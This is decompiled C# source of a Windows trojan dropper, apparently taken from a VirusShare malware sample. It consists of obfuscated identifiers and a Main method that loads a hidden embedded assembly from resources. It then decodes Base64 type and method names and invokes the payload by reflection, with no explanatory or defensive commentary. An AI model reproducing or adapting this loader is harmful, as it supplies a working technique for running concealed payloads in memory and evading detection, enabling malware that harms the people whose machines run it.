// Decompiled with JetBrains decompiler // Type:  // Assembly: Feon, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: AF8034ED-5A2C-4122-9E1B-F560737FA983 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.exwr-69a114df5525bb71f18484f15cb4dd44f7c416f26c41b8af17d2ce1b2774383e.exe using Feon.Properties; using System; using System.Text; internal sealed class \uE000 { static \uE000() => \uE009.\uE000(); private static void Main() => \uE000.\uE000(); private static void \uE000() => AppDomain.CurrentDomain.Load(Resources.\uE001).GetType(\uE000.\uE001(\uE008.\uE000(0))).GetMethod(\uE000.\uE001(\uE008.\uE000(29))).Invoke((object) null, (object[]) null); public static string \uE001(string _param0) => Encoding.UTF8.GetString(Convert.FromBase64String(_param0)); }